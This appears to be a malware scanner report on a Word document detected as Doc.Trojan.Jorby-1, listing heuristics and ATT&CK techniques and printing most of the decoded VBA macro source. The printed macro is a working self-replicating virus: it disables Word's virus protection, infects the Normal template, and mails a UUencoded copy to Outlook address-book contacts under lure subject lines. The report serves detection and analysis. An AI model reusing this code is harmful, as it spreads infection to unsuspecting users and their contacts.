MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains VBA macros with AutoOpen and AutoClose functions, indicative of malicious intent. The AutoOpen macro attempts to export its own code to the Windows directory as 'tijor.vxd' and then import it, potentially to establish persistence or download a second-stage payload. The ClamAV detection 'Doc.Trojan.Jorby-1' further supports its malicious nature. The script also attempts to interact with Outlook, suggesting potential for lateral movement or information exfiltration.
Heuristics 7
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 34,304 bytes but its declared streams total only 16,536 bytes — 17,768 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4305 bytes |
SHA-256: 476293593a0b57ec90dc13b614ceb6207437d51094e46ffebec3075a57b8b5ef |
|||
|
Detection
ClamAV:
Doc.Trojan.Jorby-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tijor"
Sub AutoOpen()
On Error Resume Next
Dim docz
' tijor by ULTRAS [MATRiX]
' (c) 2000
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
win = Environ("windir")
docz = win & "\re.doc"
Application.VBE.ActiveVBProject.VBComponents("tijor").Export win & "\tijor.vxd"
For T = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(T).Name = "tijor" Then NC = True
Next T
For U = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(U).Name = "tijor" Then AC = True
Next U
If AC = True And NC = False Then Set tij = NormalTemplate.VBProject _
Else If AC = False And NC = True Then Set tij = ActiveDocument.VBProject
With tij
With .VBComponents.Import(win & "\tijor.vxd")
End With
End With
If AC = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
ActiveDocument.SaveAs FileName:=z, FileFormat:=wdFormatDocument
End Sub
Sub AutoClose()
On Error Resume Next
Dim win, packIt
win = Environ("windir")
packIt = UUEncode(win & "\re.doc", win & "\" & "" & Application.UserName & "" & ".uue")
Set OutlookApp = CreateObject("Outlook.Application")
Set MAPIuz = OutlookApp.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\tijor\", "Tijor") <> "by ULTRAS[MATRiX]" Then
If OutlookApp = "Outlook" Then
MAPIuz.Logon "profile", "password"
For Address = 1 To MAPIuz.AddressLists.Count
Set AddyBook = MAPIuz.AddressLists(Address)
countz = 1
Set Guan0utlook = OutlookApp.CreateItem(0)
For mmez = 1 To AddyBook.AddressEntries.Count
AddBZ = AddyBook.AddressEntries(countz)
Guan0utlook.Recipients.Add AddBZ
countz = countz + 1
If countz > 30 Then oo = AddyBook.AddressEntries.Count
Next mmez
Randomize
numberz = Int(Rnd * 9) + 1
If numberz = 1 Then mez$ = "Read this..."
If numberz = 2 Then mez$ = "" & Application.UserName & " :)"
If numberz = 3 Then mez$ = "Unpack it."
If numberz = 4 Then mez$ = "New story"
If numberz = 5 Then mez$ = "Re:"
If numberz = 6 Then mez$ = "Important Info"
If numberz = 7 Then mez$ = "This is interesting..."
If numberz = 8 Then mez$ = "Look what I found..."
If numberz = 9 Then mez$ = "Check this out..."
Guan0utlook.Subject = mez$
Guan0utlook.Body = mez$
Guan0utlook.Attachments.Add win & "\" & "" & Application.UserName & "" & ".uue"
Guan0utlook.Send
AddBZ = ""
Next Address
MAPIuz.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\tijor\", "Tijor") = "by ULTRAS[MATRiX]"
End If
End Sub
Function Encode(sDa As String) As String
Dim szOut As String
Dim nChar As Integer
Dim i As Integer
If Len(sDa) Mod 3 <> 0 Then sDa = sDa & Space(3 - Len(sDa) Mod 3)
For i = 1 To Len(sDa) Step 3
szOut = szOut & Chr(Asc(Mid(sDa, i, 1)) \ 4 + 32)
szOut = szOut & Chr((Asc(Mid(sDa, i, 1)) Mod 4) * 16 + Asc(Mid(sDa, i + 1, 1)) \ 16 + 32)
szOut = szOut & Chr((Asc(Mid(sDa, i + 1, 1)) Mod 16) * 4 + Asc(Mid(sDa, i + 2, 1)) \ 64 + 32)
szOut = szOut & Chr(Asc(Mid(sDa, i + 2, 1)) Mod 64 + 32)
Next i
Encode = szOut
End Function
Function UUEncode(fileIn As String, fileOut As String) As Integer
Dim nFi As Integer, nFo As Integer
Dim indx As Integer, sDa As String
Dim lbytei As Long, lfull As Long, lmaxl As Long
On Error GoTo ERR_UUEncode
nFi = FreeFile
Open fileIn For Binary As nFi
lbytei = LOF(nFi)
nFo = FreeFile
Open fileOut For Output As nFo
For indx = Len(fileIn) - 1 To 1 Step -1
If Mid$(fileIn, indx, 1) = "\" Then
fileIn = Mid$(fileIn, indx + 1)
Exit For
End If
Next
Print #nFo, "begin 644 " & fileIn
lfull = lbytei \ 45
sDa = Space(45)
While lfull > 0
Get nFi, , sDa
Print #nFo, "M" & Encode(sDa)
lfull = lfull - 1
DoEvents
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.